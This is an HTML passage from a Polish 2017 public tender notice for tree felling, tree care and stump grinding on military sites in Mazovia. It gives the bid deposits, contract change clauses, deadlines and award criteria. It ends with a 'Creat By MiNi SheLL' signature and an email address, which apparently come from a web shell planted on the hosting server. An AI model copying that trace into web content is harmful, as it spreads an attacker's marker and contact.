                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz ofertowy - wypełniony i podpisany wg wzoru określonego 
w załączniku nr 1 do SIWZ;
Formularze cenowe - wypełnione i podpisane wg wzoru określonego 
w załączniku  nr 2 do SIWZ, odpowiednio dla Części  I i Części II.
Pełnomocnictwo - jeżeli jest wymgane
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1Wykonawca przystępujący do przetargu zobowiązany jest wnieść przed upływem terminu składania ofert, wadium na cały okres związania ofertą, 
w wysokości: 4 160,00 złotych (słownie złotych: cztery tysiące sto sześćdziesiąt złotych), w tym dla:
Część 1 - w wysokości: 3 400,00 złotych (słownie złotych: trzy tysiące czterysta złotych).
Część 2 - w wysokości: 760,00 złotych (słownie złotych: siedemset sześćdziesiąt złotych).
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający wymaga, aby wybrany Wykonawca zawarł z nim umowę 
na warunkach określonych w projekcie umowy, stanowiącym zał. nr 6 i 6a 
do SIWZ ( odpowiednio do części).
2.	Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej:
3.	Zamawiający dopuszcza możliwość zlecenia Wykonawcy realizacji dodatkowych usług, nieobjętych zamówieniem podstawowym w przypadku, gdy będzie to niezbędne oraz będą spełnione łącznie następujące warunki:
a)	zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego;
b)	zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego;
c)	wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej w niniejszej umowie;
4.	Zamawiający dopuszcza możliwość dokonania zmian gdy zostaną spełnione łącznie warunki:
a)	Konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć;
b)	Wartość zmiany nie przekracza 50% wartości zamówienia określonej w niniejszej umowie
5.	Zamawiający przewiduje możliwość zmiany w przypadku gdy Wykonawcę, ma zastąpić nowy Wykonawca:
a)	w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;
b)	w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwykonawców;
6.	Zamawiający dopuszcza możliwość zmiany umowy, w przypadku gdy zmiany te niezależnie od ich wartości nie są istotne w rozumieniu art. 144 ust.1e ustawy PZP;
7.	Zamawiający dopuszcza możliwość dokonania zmian umowy, gdy łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy PZP i jest mniejsza od 10% wartości zamówienia określonej w niniejszej umowie;
8.	Zamawiający zastrzega sobie prawo do zmniejszenia zakresu usługi w przypadku zaistnienia okoliczności organizacyjnych i formalnych, a także zmiany uwarunkowań prawnych, bądź zmian organizacyjnych struktur użytkownika o nie więcej niż 50% wartości określonej w niniejszej umowie.
9.	Zamawiający zastrzega sobie prawo do zmniejszenia wynagrodzenia Wykonawcy o wartość zmniejszonego zakresu usług. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem zakresu  i wartości przewidzianych w umowie;
10.	Powyższe zmiany wymagają zachowania formy pisemnej (w formie aneksu), 
pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />Dokumenty stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy 
z dnia 26 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (Dz. U. 
z 2003 r. nr 153, poz. 1503 z późn. zm.) powinny być umieszczone 
w oddzielnej kopercie z napisem TAJEMNICA PRZEDSIĘBIORSTWA.
Wykonawca ma obowiązek wykazać na etapie składania oferty, 
że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.
Przez tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust 4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2003 r., 
nr 153, poz. 1503, z późn. zm.) rozumie się nieujawnione do wiadomości publicznej informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, 
co, do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności. 
Wykonawca nie może zastrzec informacji. o których mowa w art. 86 ust. 4 ustawy Pzp, tj. nazwy (firmy) oraz adresów wykonawców, a także informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofertach.
<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>	Część 1 - usługa polegająca na wycince drzew oraz krzewów ( w tym wywrotów i złomów), pielęgnacji drzew i krzewów  (poza strefą konserwatorską), usuwaniu samosiewów i  odrostów, karczowaniu samosiewów i odrostów, karczowaniu krzewów, frezowaniu karp<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opis przedmiotu zamówienia dla części I:
1)	Wykonawca zobowiązuje się do wykonywania usługi będącej przedmiotem umowy z należytą starannością i dokładnością, zgodnie ze sztuką ogrodniczą, zasadami współczesnej wiedzy technicznej oraz zgodnie z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia w zakresie wycinki drzew oraz krzewów (w tym wywrotów 
i złomów), pielęgnacji drzew i krzewów (poza strefą konserwatorską), usuwaniu samosiewów i  odrostów, karczowaniu samosiewów i odrostów, karczowaniu krzewów, frezowaniu karp.
2)	Wykonawca przy realizacji przedmiotu umowy w zakresie usunięcia wywrotów i złomów zobowiązuje się do:
a)	przystąpienia do usunięcia wywrotów i złomów w terminie maksymalnie do 24 godz. od każdorazowego zgłoszenia Zamawiającego;
b)	pocięcia uzyskanego drewna na kawałki o długości około 1mb;
c)	przewiezienia własnym transportem uzyskanego drewna w miejsce wskazane przez przedstawiciela Sekcji Obsługi Infrastruktury, 
w przypadku SOI Warszawa  Rembertów (rejony: Pilawa, Zielonka, Puszcza Mariańska;) przewiezienia drewna z wycinki na teren SOI Rembertów przy  ul. Marsa 110, w przypadku SOI Przasnysz  (rejon Ciechanów) przewiezienia drewna z wycinki na teren SOI Przasnysz przy ul. Makowskiej 1 w Przasnyszu.
d)	ułożenia pociętego drewna w stosy dogodne do obmiaru w miejscu wskazanym przez przedstawiciela Sekcji Obsługi Infrastruktury; 
e)	podania objętości netto posegregowanego drewna w m3/kubikach;
f)	usunięcie na własny koszt karp po wywrotach;
g)	usunięcia na własny koszt odpadów z usuwania wywrotów i złomów;
h)	na własny koszt uzupełninia ziemią ogrodniczą ubytków po karpach wywróconych drzew i krzewów;
i)	w przypadku usuwania wywrotów i złomów na trawniku, zasianie trawy na terenie z którego usuwane były wywroty i złomy.
3)	Wykonawca przy realizacji przedmiotu umowy w zakresie wycinki zobowiązuje się do:
a)	wycinki zgodnie z każdorazowym zgłoszeniem Zamawiającego; 
b)	ścinania drzew, krzewów oraz samosiewów na minimalnej wysokości 
od gruntu;
c)	pocięcia uzyskanego drewna na kawałki o długości około 1mb;
d)	przewiezienia własnym transportem uzyskanego drewna w miejsce wskazane przez przedstawiciela Sekcji Obsługi Infrastruktury, 
w przypadku SOI Warszawa  Rembertów (rejony: Pilawa, Zielonka, Puszcza Mariańska;) przewiezienia drewna  z wycinki na teren SOI Rembertów przy  ul. Marsa 110, w przypadku SOI Przasnysz  (rejon Ciechanów) przewiezienia drewna z wycinki na teren SOI Przasnysz przy ul. Makowskiej 1 w Przasnyszu.
e)	ułożenia pociętego drewna w stosy dogodne do obmiaru w miejscu wskazanym przez przedstawiciela Sekcji Obsługi Infrastruktury; 
f)	podania objętości netto posegregowanego drewna w m3/kubikach;
g)	wycinkę należy wykonać w taki sposób aby nie uszkodzić drzew 
i krzewów przewidzianych do zachowania.
h)	 podczas wycinki należy chronić przed uszkodzeniem elementy występujące w pobliżu usuwanych drzew np. nawierzchnie dróg 
i chodników, ogrodzenia, tereny zielone, budynki i budowle sieci uzbrojenia terenu itp. W razie konieczności należy wykonać ścinkę selekcyjną z ukierunkowanym upadkiem obcinanych gałęzi, konarów 
lub części pnia, ewentualnie zastosować metodę opuszczania elementów 
na linach.
i)	Po zakończeniu prac - usunięcia na własny koszt odpadów po wycince drzew i krzewów. 
j)	zasianie trawy w przypadku wycinki drzew i krzewów rosnących 
na trawniku, jeżeli nastąpiło jego uszkodzenie.
4)	Wykonawca przy realizacji przedmiotu umowy w zakresie pielęgnacji zobowiązuje się do:
a)	pielęgnacji drzew i krzewów zgodnie z każdorazowym zgłoszeniem Zamawiającego;
b)	 do dokonania cięć sanitarnych, korekcyjnych i prześwietlających, niezbędnych do utrzymania dobrego stanu zdrowotnego drzew, ich prawidłowej statyki i pokroju oraz usunięcia niebezpieczeństwa obłamania się suchych lub uszkodzonych konarów;
c)	po zakończeniu prac usunięcie na własny koszt odpadów po wykonaniu pielęgnacji drzew i krzewów. Wykonawca przy realizacji przedmiotu umowy w zakresie frezowania pni zobowiązuje się do:
a)	frezowania pni zgodnie z każdorazowym zgłoszeniem Zamawiającego; 
b)	usunięcia pni wraz z karpiną na głębokość co najmniej 15 cm 
pod powierzchnią gruntu; 
c)	usunięcia na własny koszt odpadów z frezowania pni;
d)	uzupełnienia na własny koszt powstałych ubytków po frezowaniu ziemią ogrodniczą; 
e)	wyrównania i oczyszczenia terenu objętego frezowaniem pni 
po zakończeniu prac.
f)	w przypadku frezowania na trawniku, zasianie trawy na wyfrezowanym  terenie.
5)	Wykonawca przy realizacji przedmiotu umowy w zakresie karczowania samosiewów, odrostów i krzewów zobowiązuje się do:
a)	usunięcia roślin wraz z bryłą korzeniową;
b)	uzupełnienia na własny koszt ziemią ogrodniczą ubytków powstałych o karczowaniu;
c)	usunięcia na własny koszt wykarczowanych samosiewów, odrostów 
i krzewów;
d)	wyrównania i oczyszczenia terenu objętego karczowaniem;
e)	w przypadku karczowania na trawniku, zasianie trawy 
na wykarczowanym terenie.

6)	Zleceniobiorca zobowiązuje się do posiadania i stosowania materiałów 
i środków bhp i ochrony osobistej np. kaski ochronne, okulary, rękawice, szelki bezpieczeństwa, obuwie ochronne i specjalistyczne.
7)	Podczas wycinki drzew oraz krzewów (w tym wywrotów i złomów), pielęgnacji drzew i krzewów (poza strefą konserwatorską), usuwania samosiewów i odrostów, karczowania samosiewów i odrostów, karczowania krzewów, frezowania karp  Wykonawca zobowiązuje się chronić przed uszkodzeniem elementy występujące w pobliżu prowadzonych prac, np. nawierzchnie dróg i chodników, ogrodzenia, treny zielone, budynki 
i budowle sieci uzbrojenia terenu itp. W razie konieczności należy wykonać ścinkę selekcyjną z ukierunkowanym upadkiem obcinanych gałęzi, konarów 
lub ewentualnie zastosować metodę opuszczania elementów na linach.
8)	Wykonawca zobowiązuje się do usunięcia na własny koszt odpadów pochodzących z wycinki, pielęgnacji, frezowania tj. gałęzi, liści, korzeni, karp itp.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas przystąpienia do realizacji zlecenia</td><td>20</td></tr><tr><td>Czas przystąpienia do usunięcia  wywrotów i złomów</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>	Część 2 - usługa polegająca na: pielęgnacji drzew i krzewów, na terenach kompleksów wojskowych w rejonie działania  26 Wojskowego Oddziału Gospodarczego ( rejony: Kazuń, Modlin, Ostrów Mazowiecka, Przasnysz, Ciechanów)  w strefie konserwatorskiej.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opis przedmiotu zamówienia dla części II:
1)	Wykonawca zobowiązuje się do wykonywania usługi będącej przedmiotem umowy z należytą starannością i dokładnością, zgodnie ze sztuką ogrodniczą, zasadami współczesnej wiedzy technicznej oraz zgodnie z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia w zakresie pielęgnacji drzew i krzewów, na terenach kompleksów wojskowych w rejonie działania 26 Wojskowego Oddziału Gospodarczego ( rejony: Kazuń, Modlin, Ostrów Mazowiecka, Przasnysz, Ciechanów)  w strefie konserwatorskiej.
2)	Wykonawca przy realizacji przedmiotu umowy w zakresie pielęgnacji zobowiązuje się do:
a)	 pielęgnacji drzew i krzewów zgodnie z każdorazowym zgłoszeniem Zamawiającego;
b)	 dokonania cięć sanitarnych, korekcyjnych i prześwietlających, niezbędnych do utrzymania dobrego stanu zdrowotnego drzew, 
ich prawidłowej statyki i pokroju oraz usunięcia niebezpieczeństwa obłamania się suchych lub uszkodzonych konarów;
c)	po zakończeniu prac usunięcie na własny koszt odpadów po wykonaniu pielęgnacji drzew i krzewów. 
d)	pielęgnację należy wykonać w taki sposób aby nie uszkodzić drzew 
i krzewów przewidzianych do zachowania;
e)	 podczas pielęgnacji należy chronić przed uszkodzeniem elementy występujące w pobliżu pielęgnowanych drzew np. nawierzchnie dróg 
i chodników, ogrodzenia, treny zielone, budynki i budowle sieci uzbrojenia terenu itp. W razie konieczności należy wykonać ścinkę selekcyjną z ukierunkowanym upadkiem obcinanych gałęzi, konarów  lub ewentualnie zastosować metodę opuszczania elementów na linach.
3)	Zleceniobiorca zobowiązuje się do posiadania i stosowania materiałów 
i środków bhp i ochrony osobistej np. kaski ochronne, okulary, rękawice, szelki bezpieczeństwa, obuwie ochronne i specjalistyczne.
4)	Wykonawca zobowiązuje się do usunięcia na własny koszt odpadów pochodzących  z pielęgnacji drzew i krzewów. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas przystąpienia do realizacji zlecenia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com